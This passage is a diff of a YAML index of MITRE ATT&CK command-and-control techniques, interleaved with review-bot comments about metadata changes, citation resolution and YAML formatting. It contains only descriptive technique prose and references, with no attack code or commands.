+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
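Review bot: the double-quoted `description` scalar of the new T1071.005 object is broken around 'Protocols such as MQTT' / ', XMPP' / ', AMQP' / ', and STOMP', with the protocol names sitting on lines that carry no `+` prefix; as shown, this hunk will not apply cleanly and the resulting YAML string would be malformed. The protocol names look like hyperlink text whose markup was lost on the way into the file, so re-export the description as a single quoted scalar or a `|-` block, matching the other objects. Also note `x_mitre_detection: ''` is an empty string for this technique, so anything that renders detection guidance from this index should tolerate an empty value rather than a missing key.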
@@ -37158,7 +37639,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -37190,7 +37670,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37212,22 +37692,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
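Review bot: the T1071 description edit ('transferring files, electronic mail, DNS, or publishing/subscribing') and the forward-moving `modified` of '2024-08-28T14:10:33.145Z' line up with the T1071.005 Publish/Subscribe Protocols sub-technique added in this patch, so this hunk is consistent; it is one of the few objects whose `modified` advances, which again points to the source bundle mixing objects from different releases, so a single-release regeneration is worth confirming.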
@@ -37249,7 +37727,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37274,7 +37752,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -37358,7 +37835,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -37422,11 +37898,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37510,7 +37985,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -37541,7 +38015,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37561,8 +38035,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
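Review bot: the link text in the T1572 description changes from [Protocol Impersonation] to [Protocol or Service Impersonation] while the target stays https://attack.mitre.org/techniques/T1001/003, so only the display name is affected; check that the T1001.003 object's own `name` in this file was updated in the same run, otherwise the link text and the target's name will disagree.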
@@ -37584,8 +38058,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -37647,7 +38119,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37695,7 +38166,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37749,7 +38219,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37782,7 +38251,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37802,8 +38271,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37841,7 +38308,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37869,42 +38336,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
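Review bot: this hunk removes the whole T1102 `external_references` block, including 'University of Birmingham C2', while the unchanged `x_mitre_detection` text still ends with (Citation: University of Birmingham C2) and the updated description adds (Citation: Broadcom BirdyClient Microsoft Graph API 2024); both source names must be present in the references re-added later in the object for the citations to resolve. The new description wording ('Popular websites, cloud services, and social media ...', 'Google, Microsoft, or Twitter') is a content update carrying a new citation, so reviewers should check the citation rather than the prose.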
@@ -37913,17 +38360,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
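Review bot: `x_mitre_permissions_required: [User]` is dropped from T1102 here, yet the same field is retained for T1568 (above), T1205.001 and T1102.003 (below) in this patch, so the file now mixes objects with and without it; if the generator is meant to track the newer object shape (`revoked`, `x_mitre_deprecated`, `x_mitre_attack_spec_version: 3.2.0`, `x_mitre_version: '1.2'`), the objects still at 2.1.0 should be regenerated from the same release. The re-added references do include both 'Broadcom BirdyClient Microsoft Graph API 2024' and 'University of Birmingham C2', so the citations in the description and detection text resolve.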
@@ -37955,7 +38424,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37972,8 +38441,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -37993,7 +38460,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -38016,8 +38483,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -38042,7 +38507,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38067,8 +38532,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -38133,7 +38596,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -38157,7 +38619,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -38182,21 +38644,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
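Review bot: the T1090.003 description switches from a `|-` block scalar to a double-quoted scalar with `\n\n` escapes and an escaped leading space (`\ Protocols such as ICMP may be used as a transport. \n\nSimilarly`), which is the dumper reacting to the trailing space after `(Citation: ORB Mandiant)` and the double space before `Protocols` in the upstream text. The substantive change is the one added sentence on ORB networks; the rest of the hunk is whitespace-driven rewrapping that hides it. Consider normalizing trailing and doubled spaces before dumping, or configuring the dumper to keep block scalars, so prose changes in future regenerations stay reviewable. The `spec_version` and `x_mitre_attack_spec_version: 2.1.0` removals at the top of the hunk follow the same pattern as the earlier hunks.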
@@ -38215,7 +38692,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -38229,6 +38706,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -38242,12 +38724,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -38297,11 +38778,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -38310,20 +38790,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
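Review bot: this hunk is pure key reordering for T1571 (`x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` move above `x_mitre_platforms` with unchanged values), so it adds diff noise without a semantic change. If the generator now emits keys in the order the source bundle has them, that is acceptable but deserves a sentence in the PR description; otherwise sorting keys deterministically would keep future regenerations down to the real changes, which for T1571 are the `x_mitre_attack_spec_version: 3.2.0` bump and the updated reference URL in the following hunk.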
@@ -38348,17 +38828,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -38414,7 +38893,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -38439,7 +38917,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -38476,8 +38954,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -38531,7 +39007,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38603,33 +39078,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
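Review bot: T1001.003 is renamed from `Protocol Impersonation` to `Protocol or Service Impersonation`, and its old header block (`x_mitre_platforms`, `id`, `created`, the references) is removed here and re-emitted lower in the object. Anything in the repo that keys on the technique name rather than the ID, such as the Technique Name column of the CSV indexes and any Markdown index, has to be regenerated from this same data in the same PR or the two will disagree. `atomic_tests: []` stays empty, so no test files carry the old name.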
@@ -38637,23 +39091,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
